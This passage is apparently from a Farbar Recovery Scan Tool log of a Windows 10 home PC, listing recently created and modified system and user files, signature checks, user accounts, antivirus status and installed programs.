    2017-01-10 22:47 - 2016-12-21 02:05 - 00425984 _____ (Microsoft Corporation) C:\WINDOWS\system32\aadcloudap.dll
    2017-01-10 22:47 - 2016-12-21 02:05 - 00049152 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Shell.dll
    2017-01-10 22:47 - 2016-12-21 02:01 - 09131008 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.dll
    2017-01-10 22:47 - 2016-12-21 01:59 - 01908224 _____ (Microsoft Corporation) C:\WINDOWS\system32\AzureSettingSyncProvider.dll
    2017-01-10 22:47 - 2016-12-21 01:56 - 00947712 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSVP9DEC.dll
    2017-01-10 22:47 - 2016-12-21 01:56 - 00936960 _____ (Microsoft Corporation) C:\WINDOWS\system32\MCRecvSrc.dll
    2017-01-10 22:47 - 2016-12-21 01:55 - 08129536 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakra.dll
    2017-01-10 22:47 - 2016-12-21 01:55 - 04749312 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_nt.dll
    2017-01-10 22:47 - 2016-12-21 01:53 - 06664192 _____ (Microsoft Corporation) C:\WINDOWS\system32\mspaint.exe
    2017-01-10 22:47 - 2016-12-21 01:51 - 08075776 _____ (Microsoft Corporation) C:\WINDOWS\system32\mstscax.dll
    2017-01-10 22:47 - 2016-12-21 01:49 - 04149248 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpcorets.dll
    2017-01-10 22:47 - 2016-12-21 01:49 - 02691072 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Logon.dll
    2017-01-10 22:47 - 2016-12-21 01:49 - 01062912 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingSyncCore.dll
    2017-01-10 22:47 - 2016-12-21 01:47 - 01121280 _____ (Microsoft Corporation) C:\WINDOWS\system32\aadtb.dll
    2017-01-10 22:47 - 2016-12-14 00:34 - 02482280 _____ (Microsoft Corporation) C:\WINDOWS\system32\msmpeg2vdec.dll
    2017-01-10 22:47 - 2016-12-14 00:23 - 00404832 _____ (Microsoft Corporation) C:\WINDOWS\system32\msv1_0.dll
    2017-01-10 22:47 - 2016-12-14 00:19 - 00584544 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingSyncHost.exe
    2017-01-10 22:47 - 2016-12-14 00:17 - 00319288 _____ (Microsoft Corporation) C:\WINDOWS\system32\wow64.dll
    2017-01-10 22:47 - 2016-12-14 00:14 - 01694712 _____ (Microsoft Corporation) C:\WINDOWS\system32\winmde.dll
    2017-01-10 22:47 - 2016-12-13 23:46 - 00206848 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32k.sys
    2017-01-10 22:47 - 2016-12-13 23:43 - 00201728 _____ (Microsoft Corporation) C:\WINDOWS\system32\ScDeviceEnum.dll
    2017-01-10 22:47 - 2016-12-13 23:42 - 00352768 _____ (Microsoft Corporation) C:\WINDOWS\system32\cloudAP.dll
    2017-01-10 22:47 - 2016-12-13 23:42 - 00236544 _____ (Microsoft Corporation) C:\WINDOWS\system32\WinSCard.dll
    2017-01-10 22:47 - 2016-12-13 23:40 - 00193536 _____ (Microsoft Corporation) C:\WINDOWS\system32\certprop.dll
    2017-01-10 22:47 - 2016-12-13 23:39 - 00837632 _____ (Microsoft Corporation) C:\WINDOWS\system32\wbiosrvc.dll
    2017-01-10 22:47 - 2016-12-13 23:39 - 00290816 _____ (Microsoft Corporation) C:\WINDOWS\system32\updatehandlers.dll
    2017-01-10 22:47 - 2016-12-13 23:37 - 00090112 _____ (Microsoft Corporation) C:\WINDOWS\system32\updatepolicy.dll
    2017-01-10 22:47 - 2016-12-13 23:36 - 01002496 _____ (Microsoft Corporation) C:\WINDOWS\system32\SRH.dll
    2017-01-10 22:47 - 2016-12-13 23:36 - 00539648 _____ (Microsoft Corporation) C:\WINDOWS\system32\usocore.dll
    2017-01-10 22:47 - 2016-12-13 23:26 - 00932864 _____ (Microsoft Corporation) C:\WINDOWS\system32\kerberos.dll
    2017-01-10 22:47 - 2016-12-13 23:26 - 00869888 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuapi.dll
    2017-01-10 22:47 - 2016-12-13 23:25 - 02009600 _____ (Microsoft Corporation) C:\WINDOWS\system32\SRHInproc.dll
    2017-01-10 22:47 - 2016-12-13 23:24 - 00673792 _____ (Microsoft Corporation) C:\WINDOWS\system32\winlogon.exe
    2017-01-10 22:47 - 2016-12-13 23:23 - 03134976 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpcore.dll
    2017-01-10 22:47 - 2016-12-13 23:22 - 02317824 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuaueng.dll
    2017-01-10 22:47 - 2016-12-13 23:22 - 01513472 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kbase.sys
    2017-01-10 22:47 - 2016-12-13 23:22 - 00391168 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuuhext.dll
    2017-01-10 22:47 - 2016-12-13 23:21 - 03616768 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kfull.sys
    2017-01-10 22:46 - 2016-12-21 03:08 - 00245600 _____ (Microsoft Corporation) C:\WINDOWS\system32\offlinesam.dll
    2017-01-10 22:46 - 2016-12-21 02:46 - 00624048 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\cng.sys
    2017-01-10 22:46 - 2016-12-21 02:42 - 00241504 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudExperienceHost.dll
    2017-01-10 22:46 - 2016-12-21 02:15 - 22563840 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgehtml.dll
    2017-01-10 22:46 - 2016-12-21 02:05 - 00261632 _____ (Microsoft Corporation) C:\WINDOWS\system32\indexeddbserver.dll
    2017-01-10 22:46 - 2016-12-21 02:00 - 00440320 _____ (Microsoft Corporation) C:\WINDOWS\system32\fhcfg.dll
    2017-01-10 22:46 - 2016-12-21 01:59 - 00883712 _____ (Microsoft Corporation) C:\WINDOWS\system32\samsrv.dll
    2017-01-10 22:46 - 2016-12-21 01:58 - 23678464 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
    2017-01-10 22:46 - 2016-12-21 01:57 - 00462336 _____ (Microsoft Corporation) C:\WINDOWS\system32\fhsettingsprovider.dll
    2017-01-10 22:46 - 2016-12-21 01:53 - 04474368 _____ (Microsoft Corporation) C:\WINDOWS\system32\D3DCompiler_47.dll
    2017-01-10 22:46 - 2016-12-21 01:51 - 05611008 _____ (Microsoft Corporation) C:\WINDOWS\system32\d2d1.dll
    2017-01-10 22:46 - 2016-12-21 01:50 - 01490432 _____ (Microsoft Corporation) C:\WINDOWS\system32\lsasrv.dll
    2017-01-10 22:46 - 2016-12-13 23:48 - 01631232 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.Resources.dll
    2017-01-10 22:46 - 2016-12-13 23:42 - 00208896 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Internal.UI.Logon.ProxyStub.dll
    2017-01-10 22:46 - 2016-12-13 23:41 - 00223744 _____ (Microsoft Corporation) C:\WINDOWS\system32\ie4uinit.exe
    2017-01-10 22:46 - 2016-12-13 23:40 - 00324096 _____ (Microsoft Corporation) C:\WINDOWS\system32\domgmt.dll
    2017-01-10 22:46 - 2016-12-13 23:40 - 00266752 _____ (Microsoft Corporation) C:\WINDOWS\system32\ConsoleLogon.dll
    2017-01-10 22:46 - 2016-12-13 23:39 - 00257024 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.CredDialogController.dll
    2017-01-10 22:46 - 2016-12-13 23:38 - 17188864 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.dll
    2017-01-10 22:46 - 2016-12-13 23:35 - 00600576 _____ (Microsoft Corporation) C:\WINDOWS\system32\cryptui.dll
    2017-01-10 22:46 - 2016-12-13 23:24 - 01005568 _____ (Microsoft Corporation) C:\WINDOWS\system32\D3D12.dll
    2017-01-10 22:46 - 2016-12-13 23:23 - 01231872 _____ (Microsoft Corporation) C:\WINDOWS\system32\dosvc.dll
    2017-01-10 22:46 - 2016-12-13 23:22 - 00707584 _____ (Microsoft Corporation) C:\WINDOWS\system32\LogonController.dll
    2017-01-10 22:45 - 2016-12-21 02:37 - 00455520 _____ (Microsoft Corporation) C:\WINDOWS\system32\securekernel.exe
    2017-01-10 22:45 - 2016-12-21 01:54 - 05511680 _____ (Microsoft Corporation) C:\WINDOWS\system32\aclui.dll
    2017-01-10 22:45 - 2016-12-21 01:53 - 01692672 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.onecore.dll
    2017-01-10 22:45 - 2016-12-21 01:51 - 02275840 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentServer.dll
    2017-01-10 22:45 - 2016-12-14 00:41 - 01235296 _____ (Microsoft Corporation) C:\WINDOWS\system32\aeinv.dll
    2017-01-10 22:45 - 2016-12-14 00:41 - 00590960 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioSes.dll
    2017-01-10 22:45 - 2016-12-14 00:33 - 01356864 _____ (Microsoft Corporation) C:\WINDOWS\system32\ClipUp.exe
    2017-01-10 22:45 - 2016-12-14 00:18 - 00715104 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\vhdmp.sys
    2017-01-10 22:45 - 2016-12-14 00:18 - 00335712 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\pci.sys
    2017-01-10 22:45 - 2016-12-14 00:14 - 00418952 _____ (Microsoft Corporation) C:\WINDOWS\system32\AUDIOKSE.dll
    2017-01-10 22:45 - 2016-12-14 00:14 - 00089416 _____ (Microsoft Corporation) C:\WINDOWS\system32\remoteaudioendpoint.dll
    2017-01-10 22:45 - 2016-12-13 23:38 - 00295424 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudBackupSettings.dll
    2017-01-10 22:45 - 2016-11-02 06:00 - 00534096 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioEng.dll
    2017-01-10 22:45 - 2016-11-02 05:28 - 00324608 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.LockScreen.dll
    2017-01-10 22:45 - 2016-11-02 05:22 - 00337920 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioEndpointBuilder.dll
    2017-01-10 22:45 - 2016-11-02 05:21 - 00942080 _____ (Microsoft Corporation) C:\WINDOWS\system32\audiosrv.dll
    2017-01-10 17:38 - 2017-01-10 17:38 - 00176064 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MBAMChameleon.sys
    2017-01-10 17:37 - 2017-01-31 23:12 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes
    2017-01-10 17:37 - 2017-01-24 22:12 - 00091584 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mwac.sys
    2017-01-10 17:37 - 2017-01-21 21:09 - 00102856 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\farflt.sys
    2017-01-10 17:37 - 2017-01-20 07:47 - 00077416 _____ C:\WINDOWS\system32\Drivers\mbae64.sys
    2017-01-10 17:37 - 2017-01-10 17:37 - 00001919 _____ C:\Users\Public\Desktop\Malwarebytes.lnk
    2017-01-10 17:37 - 2017-01-10 17:37 - 00000000 ____D C:\Program Files\Malwarebytes
    2017-01-10 08:16 - 2017-01-31 15:36 - 00000000 ____D C:\Users\Joseph\Desktop\Marina
    2017-01-08 19:56 - 2017-01-31 20:39 - 00000000 ___RD C:\Users\Joseph\Creative Cloud Files
    2017-01-08 19:53 - 2017-01-08 19:53 - 00000000 ____D C:\Users\Joseph\AppData\Local\CEF
    2017-01-08 19:49 - 2017-01-08 19:49 - 00804440 _____ (Adobe Systems Incorporated) C:\Users\Joseph\Downloads\CreativeCloudSet-Up (1).exe
    2017-01-06 16:13 - 2017-01-06 16:13 - 00000000 ____D C:\Program Files\Common Files\Intel
    2017-01-06 16:13 - 2017-01-06 16:13 - 00000000 ____D C:\Program Files (x86)\Cisco
    2017-01-04 16:04 - 2017-01-04 16:04 - 00313276 _____ C:\Users\Joseph\Downloads\reciept2.pdf
    2017-01-04 16:04 - 2017-01-04 16:04 - 00273789 _____ C:\Users\Joseph\Downloads\reciept1.pdf
    2017-01-03 19:19 - 2017-01-24 21:11 - 00000000 ____D C:\Users\Joseph\Desktop\Joe
    2017-01-02 16:12 - 2017-01-31 23:03 - 00087912 _____ C:\Users\Joseph\Desktop\A79BE330
    2017-01-02 16:12 - 2017-01-31 07:35 - 00087850 _____ C:\Users\Joseph\Desktop\Annual Budget - 2017.xlsx
     
    ==================== One Month Modified files and folders ========
     
    (If an entry is included in the fixlist, the file/folder will be moved.)
     
    2017-02-01 17:45 - 2016-09-23 17:44 - 00000000 ____D C:\Users\Joseph\AppData\Roaming\Skype
    2017-02-01 17:43 - 2016-07-16 06:47 - 00000000 ___HD C:\Program Files\WindowsApps
    2017-02-01 17:43 - 2016-07-16 06:47 - 00000000 ____D C:\WINDOWS\AppReadiness
    2017-02-01 17:33 - 2016-09-29 08:55 - 00000000 ____D C:\WINDOWS\system32\SleepStudy
    2017-02-01 17:17 - 2016-09-29 09:03 - 01320142 _____ C:\WINDOWS\system32\PerfStringBackup.INI
    2017-02-01 17:09 - 2016-09-29 08:58 - 00000180 _____ C:\WINDOWS\system32\{A6D608F0-0BDE-491A-97AE-5C4B05D86E01}.bat
    2017-02-01 17:09 - 2016-09-22 19:48 - 00251848 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MBAMSwissArmy.sys
    2017-02-01 17:09 - 2016-09-22 19:41 - 00000000 __SHD C:\Users\Joseph\IntelGraphicsProfiles
    2017-02-01 17:08 - 2016-09-29 09:24 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
    2017-02-01 17:08 - 2016-07-16 01:04 - 00524288 _____ C:\WINDOWS\system32\config\BBI
    2017-02-01 11:20 - 2016-09-29 09:03 - 00000000 ____D C:\Users\Joseph
    2017-02-01 08:53 - 2016-10-29 21:04 - 00000000 ____D C:\Users\Joseph\AppData\Local\Adobe
    2017-02-01 08:51 - 2016-07-16 01:04 - 00032768 _____ C:\WINDOWS\system32\config\ELAM
    2017-02-01 08:45 - 2016-07-16 06:45 - 00000000 ____D C:\WINDOWS\INF
    2017-01-31 23:31 - 2016-10-18 20:11 - 00000000 ____D C:\Users\Joseph\AppData\Local\ElevatedDiagnostics
    2017-01-31 23:05 - 2016-09-23 11:59 - 00000368 _____ C:\WINDOWS\Tasks\HPCeeScheduleForJoseph.job
    2017-01-31 21:05 - 2016-09-29 09:23 - 00003264 _____ C:\WINDOWS\System32\Tasks\HPCeeScheduleForJoseph
    2017-01-31 20:50 - 2016-10-09 20:00 - 00000000 ____D C:\Program Files (x86)\ShopTracker
    2017-01-31 20:39 - 2016-10-29 21:14 - 00000000 ____D C:\ProgramData\boost_interprocess
    2017-01-30 21:00 - 2016-10-09 20:01 - 00000000 ____D C:\Users\Joseph\AmazonMeter
    2017-01-30 19:43 - 2016-07-16 06:47 - 00000000 ____D C:\WINDOWS\system32\NDF
    2017-01-28 18:25 - 2016-10-01 10:34 - 00000000 ____D C:\Users\Joseph\Desktop\Bank School
    2017-01-25 00:38 - 2016-07-16 06:36 - 00000000 ____D C:\WINDOWS\CbsTemp
    2017-01-21 21:09 - 2016-09-22 19:47 - 00043968 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbam.sys
    2017-01-21 21:06 - 2016-09-29 08:55 - 00357720 _____ C:\WINDOWS\system32\FNTCACHE.DAT
    2017-01-21 20:43 - 2015-10-30 01:28 - 00000000 ____D C:\Users\Default.migrated
    2017-01-21 09:20 - 2016-09-23 17:44 - 00000000 ____D C:\ProgramData\Skype
    2017-01-20 18:50 - 2016-12-15 07:50 - 00003292 _____ C:\WINDOWS\System32\Tasks\OneDrive Standalone Update Task v2
    2017-01-20 18:49 - 2016-09-22 19:45 - 00002377 _____ C:\Users\Joseph\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
    2017-01-20 18:49 - 2016-09-22 19:45 - 00000000 ___RD C:\Users\Joseph\OneDrive
    2017-01-19 18:39 - 2016-07-16 06:47 - 00000000 ____D C:\WINDOWS\ELAMBKUP
    2017-01-18 22:54 - 2016-09-28 12:54 - 00000000 ____D C:\Users\Joseph\Documents\UserTesting
    2017-01-18 22:27 - 2016-09-22 20:21 - 00000000 ____D C:\Users\Joseph\AppData\Local\UserTestingPlugin
    2017-01-15 15:52 - 2016-11-09 10:50 - 00000000 ____D C:\Users\Joseph\Documents\TurboTax
    2017-01-15 15:45 - 2016-11-09 10:48 - 00000479 _____ C:\ProgramData\Microsoft.SqlServer.Compact.400.32.bc
    2017-01-15 15:30 - 2016-11-09 10:49 - 00000000 ____D C:\Users\Joseph\AppData\Roaming\Intuit
    2017-01-15 15:30 - 2016-11-09 10:46 - 00000000 ____D C:\Program Files (x86)\TurboTax
    2017-01-15 14:07 - 2016-07-16 06:47 - 00000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
    2017-01-15 14:05 - 2016-04-01 13:57 - 00000000 ____D C:\Program Files (x86)\Microsoft Office
    2017-01-13 19:46 - 2016-07-16 06:47 - 00000000 ____D C:\WINDOWS\LiveKernelReports
    2017-01-13 15:56 - 2016-09-29 08:59 - 00168695 _____ C:\WINDOWS\system32\Drivers\rtkhdasetting.zip
    2017-01-13 15:56 - 2016-09-29 08:59 - 00002081 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\B&O Play Audio Control.lnk
    2017-01-13 15:56 - 2016-09-29 08:59 - 00000000 ____D C:\WINDOWS\SysWOW64\RTCOM
    2017-01-13 15:56 - 2016-08-06 13:49 - 00000000 ___HD C:\Program Files (x86)\Temp
    2017-01-13 15:53 - 2016-08-06 13:49 - 05523456 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\Drivers\RTKVHD64.sys
    2017-01-13 15:53 - 2016-08-06 13:49 - 03503048 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\RtkApi64.dll
    2017-01-13 15:53 - 2016-08-06 13:49 - 03201376 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\RltkAPO64.dll
    2017-01-13 15:53 - 2016-08-06 13:49 - 02995000 _____ (DTS, Inc.) C:\WINDOWS\system32\slcnt64.dll
    2017-01-13 15:53 - 2016-08-06 13:49 - 02839520 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\RtlExUpd.dll
    2017-01-13 15:53 - 2016-08-06 13:49 - 00192976 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\RtkCfg64.dll
    2017-01-13 15:53 - 2016-08-06 13:49 - 00023688 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\RtkCoLDR64.dll
    2017-01-13 15:53 - 2016-04-01 13:31 - 00000000 ____D C:\SWSetup
    2017-01-12 11:14 - 2016-07-16 06:47 - 00000000 ____D C:\WINDOWS\rescache
    2017-01-11 00:22 - 2015-11-02 13:02 - 00000000 __RHD C:\Users\Public\AccountPictures
    2017-01-11 00:16 - 2016-07-16 06:47 - 00000000 ___RD C:\WINDOWS\ImmersiveControlPanel
    2017-01-11 00:16 - 2016-07-16 06:47 - 00000000 ____D C:\WINDOWS\system32\WinBioPlugIns
    2017-01-11 00:16 - 2016-07-16 06:47 - 00000000 ____D C:\WINDOWS\system32\oobe
    2017-01-11 00:16 - 2016-07-16 06:47 - 00000000 ____D C:\WINDOWS\ShellExperiences
    2017-01-11 00:16 - 2016-07-16 06:47 - 00000000 ____D C:\WINDOWS\Provisioning
    2017-01-10 23:28 - 2016-09-23 16:25 - 00000000 ____D C:\WINDOWS\system32\MRT
    2017-01-10 23:25 - 2016-09-23 16:25 - 135657872 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
    2017-01-10 17:37 - 2016-09-22 19:47 - 00000000 ____D C:\ProgramData\Malwarebytes
    2017-01-08 21:19 - 2016-09-22 19:41 - 00000000 ____D C:\Users\Joseph\AppData\Roaming\Adobe
    2017-01-08 20:09 - 2016-10-29 21:27 - 00000000 ____D C:\Program Files\Adobe
    2017-01-08 20:02 - 2016-10-29 21:33 - 00000000 ____D C:\ProgramData\regid.1986-12.com.adobe
    2017-01-08 19:54 - 2016-10-29 21:14 - 00000000 __RHD C:\Users\Joseph\[email protected] Creative Cloud Files
    2017-01-08 19:52 - 2016-10-29 21:10 - 00001309 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Creative Cloud.lnk
    2017-01-08 19:52 - 2016-10-29 21:10 - 00001297 _____ C:\Users\Public\Desktop\Adobe Creative Cloud.lnk
    2017-01-08 19:49 - 2016-09-22 19:41 - 00000000 ____D C:\Users\Joseph\AppData\Local\VirtualStore
    2017-01-06 16:13 - 2016-09-29 08:57 - 00000000 ____D C:\Program Files (x86)\Intel
    2017-01-06 16:13 - 2016-09-22 19:54 - 00000000 ____D C:\ProgramData\Intel
    2017-01-06 16:11 - 2016-09-29 08:58 - 00000000 ____D C:\Program Files\Intel
    2017-01-02 18:29 - 2016-10-02 22:40 - 00046599 _____ C:\Users\Joseph\Desktop\Expense Tracking.xlsx
     
    ==================== Files in the root of some directories =======
     
    2017-01-20 13:28 - 2017-01-20 13:28 - 0000184 _____ () C:\Users\Joseph\AppData\Roaming\6ov.vbs
    2017-01-31 23:27 - 2017-01-31 23:27 - 0000017 _____ () C:\Users\Joseph\AppData\Local\resmon.resmoncfg
    2017-02-01 08:27 - 2017-02-01 08:27 - 0047353 _____ () C:\ProgramData\agent.1485955633.bdinstall.bin
    2016-11-30 08:18 - 2016-11-30 08:18 - 0000057 _____ () C:\ProgramData\Ament.ini
    2017-02-01 08:47 - 2017-02-01 08:47 - 0403991 _____ () C:\ProgramData\cl.1485956260.bdinstall.bin
    2017-02-01 08:52 - 2017-02-01 08:52 - 0056949 _____ () C:\ProgramData\dm.1485956857.bdinstall.bin
    2017-02-01 16:52 - 2017-02-01 16:52 - 0040137 _____ () C:\ProgramData\dm.1485985887.bdinstall.bin
    2016-11-09 10:48 - 2017-01-15 15:45 - 0000479 _____ () C:\ProgramData\Microsoft.SqlServer.Compact.400.32.bc
     
    ==================== Bamital & volsnap ======================
     
    (There is no automatic fix for files that do not pass verification.)
     
    C:\WINDOWS\system32\winlogon.exe => File is digitally signed
    C:\WINDOWS\system32\wininit.exe => File is digitally signed
    C:\WINDOWS\explorer.exe => File is digitally signed
    C:\WINDOWS\SysWOW64\explorer.exe => File is digitally signed
    C:\WINDOWS\system32\svchost.exe => File is digitally signed
    C:\WINDOWS\SysWOW64\svchost.exe => File is digitally signed
    C:\WINDOWS\system32\services.exe => File is digitally signed
    C:\WINDOWS\system32\User32.dll => File is digitally signed
    C:\WINDOWS\SysWOW64\User32.dll => File is digitally signed
    C:\WINDOWS\system32\userinit.exe => File is digitally signed
    C:\WINDOWS\SysWOW64\userinit.exe => File is digitally signed
    C:\WINDOWS\system32\rpcss.dll => File is digitally signed
    C:\WINDOWS\system32\dnsapi.dll => File is digitally signed
    C:\WINDOWS\SysWOW64\dnsapi.dll => File is digitally signed
    C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed
     
    LastRegBack: 2017-01-23 10:44
     
    ==================== End of FRST.txt ============================
     
    Addition:
     
    Additional scan result of Farbar Recovery Scan Tool (x64) Version: 29-01-2017
    Ran by Joseph (01-02-2017 17:47:43)
    Running from C:\Users\Joseph\Downloads
    Windows 10 Home Version 1607 (X64) (2016-09-29 14:26:58)
    Boot Mode: Normal
    ==========================================================
     
     
    ==================== Accounts: =============================
     
    Administrator (S-1-5-21-2731509489-3924948741-1415746157-500 - Administrator - Disabled)
    DefaultAccount (S-1-5-21-2731509489-3924948741-1415746157-503 - Limited - Disabled)
    Guest (S-1-5-21-2731509489-3924948741-1415746157-501 - Limited - Disabled)
    Joseph (S-1-5-21-2731509489-3924948741-1415746157-1001 - Administrator - Enabled) => C:\Users\Joseph
     
    ==================== Security Center ========================
     
    (If an entry is included in the fixlist, it will be removed.)
     
    AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
    AV: Bitdefender Antivirus (Enabled - Out of date) {3FB17364-4FCC-0FA7-6BBF-973897395371}
    AS: Bitdefender Antispyware (Enabled - Out of date) {84D09280-69F6-0029-510F-AC4AECBE19CC}
    AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
    FW: Bitdefender Firewall (Enabled) {078AF241-05A3-0EFF-40E0-3E0D69EA140A}
     
    ==================== Installed Programs ======================
     
    (Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
     
    12 Labours of Hercules III: Girl Power (x32 Version: 3.0.2.118 - WildTangent) Hidden
    Adobe Creative Cloud (HKLM-x32\...\Adobe Creative Cloud) (Version: 3.9.5.353 - Adobe Systems Incorporated)
    Adobe Lightroom (HKLM-x32\...\{8048A5DF-8A70-5BE1-954B-E0FDE1BD0D0D}) (Version: 6.8 - Adobe Systems Incorporated)
    Adobe Shockwave Player 12.2 (HKLM-x32\...\Adobe Shockwave Player) (Version: 12.2.5.195 - Adobe Systems, Inc.)
    Awakening: The Dreamless Castle (x32 Version: 3.0.2.51 - WildTangent) Hidden
    Azkend 2: The World Beneath (x32 Version: 2.2.0.98 - WildTangent) Hidden
    Barn Yarn Collector's Edition (x32 Version: 3.0.2.48 - WildTangent) Hidden
    Bitdefender Agent (HKLM\...\Bitdefender Agent) (Version: 21.0.21.970 - Bitdefender)
    Bitdefender Device Management (HKLM\...\Bitdefender Device Management) (Version: 21.0.23.1101 - Bitdefender)
    Bitdefender Total Security 2017 (HKLM\...\Bitdefender) (Version: 21.0.23.1101 - Bitdefender)
    Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.)
    Citrix Receiver 4.5 (HKLM-x32\...\CitrixOnlinePluginPackWeb) (Version: 14.5.0.10018 - Citrix Systems, Inc.)
    CyberLink Power Media Player 14 (HKLM-x32\...\{32C8E300-BDB4-4398-92C2-E9B7D8A233DB}) (Version: 14.0.4.6527 - CyberLink Corp.)
    CyberLink PowerDirector 12 (HKLM-x32\...\InstallShield_{E1646825-D391-42A0-93AA-27FA810DA093}) (Version: 12.0.6.4925 - CyberLink Corp.)
    CyberLink PowerDirector 12 (Version: 12.0.6.4925 - CyberLink Corp.) Hidden
    Delicious: Emily's Wonder Wedding Premium Edition (x32 Version: 3.0.2.59 - WildTangent) Hidden
    DisableMSDefender (Version: 1.0.0 - Hewlett-Packard Company) Hidden
    Dropbox 25 GB (HKLM-x32\...\{736A97C6-8766-3699-84A9-71736C5E0CE3}) (Version: 3.1.11.0 - Dropbox, Inc.)
    Dropbox Update Helper (x32 Version: 1.3.59.1 - Dropbox, Inc.) Hidden
    Energy Star (HKLM\...\{5CB22648-35F8-41BC-9C35-1E41FE6E12A5}) (Version: 1.1.1 - HP Inc.)
    Entwined: The Perfect Murder (x32 Version: 3.0.2.59 - WildTangent) Hidden
    Google Chrome (HKLM-x32\...\Google Chrome) (Version: 55.0.2883.87 - Google Inc.)
    Google Update Helper (x32 Version: 1.3.32.7 - Google Inc.) Hidden
    Green City: Go South (x32 Version: 3.0.2.59 - WildTangent) Hidden
    Home Makeover (x32 Version: 3.0.2.59 - WildTangent) Hidden
    Hoyle Illusions Mahjongg (x32 Version: 3.0.2.59 - WildTangent) Hidden
    HP 3D DriveGuard (HKLM-x32\...\{E8D0E2B8-B64B-44BC-8E01-00DDACBDF78A}) (Version: 6.0.28.1 - Hewlett-Packard Company)
    HP CoolSense (HKLM-x32\...\{0C723C74-62DF-4B35-9490-A207546D866D}) (Version: 2.21.4 - HP Inc.)
    HP Documentation (HKLM\...\HP_Documentation) (Version: 1.0.0.1 - HP Inc.)
    HP ePrint SW (HKLM-x32\...\{88970959-baf7-4864-a39a-69a58e8ae5cf}) (Version: 5.0.18701 - HP)
    HP Photosmart 6520 series Basic Device Software (HKLM\...\{1151BCF8-3246-4E34-9C17-22E66318C41C}) (Version: 28.0.1315.0 - Hewlett-Packard Co.)
    HP Photosmart 6520 series Help (HKLM-x32\...\{D3293275-1002-41F5-BC37-099B4251FF5B}) (Version: 28.0.0 - Hewlett Packard)
    HP Photosmart 6520 series Product Improvement Study (HKLM\...\{F144E07C-4019-4092-BE25-B57819C97D2F}) (Version: 28.0.1315.0 - Hewlett-Packard Co.)
    HP Registration Service (HKLM\...\{D1E8F2D7-7794-4245-B286-87ED86C1893C}) (Version: 1.2.8318.5320 - Hewlett-Packard)
    HP Support Assistant (HKLM-x32\...\{78E2C850-ADA6-420D-BA35-2F4A9BE733CC}) (Version: 8.3.50.9 - HP)
    HP Support Solutions Framework (HKLM-x32\...\{5F084DD8-AF2C-4004-9C92-820C32E4BD55}) (Version: 12.5.32.203 - HP)
    HP Sure Connect (HKLM-x32\...\{6468C4A5-E47E-405F-B675-A70A70983EA6}) (Version: 1.0.0.27 - HP Inc.)
    HP System Event Utility (HKLM-x32\...\{09D0DB68-90EA-4015-983E-A0BD777D5A02}) (Version: 1.4.10 - HP Inc.)
    HP Update (HKLM-x32\...\{912D30CF-F39E-4B31-AD9A-123C6B794EE2}) (Version: 5.005.002.002 - Hewlett-Packard)
    HP Welcome (HKLM\...\HPWelcome) (Version: 1.0 - HP Inc.)
    HP Wireless Button Driver (HKLM-x32\...\{AF4C5F64-4E6A-438B-9832-8BDEE0E7B43D}) (Version: 1.1.17.1 - HP)
    IGT Slots Fire Rubies (x32 Version: 3.0.2.59 - WildTangent) Hidden
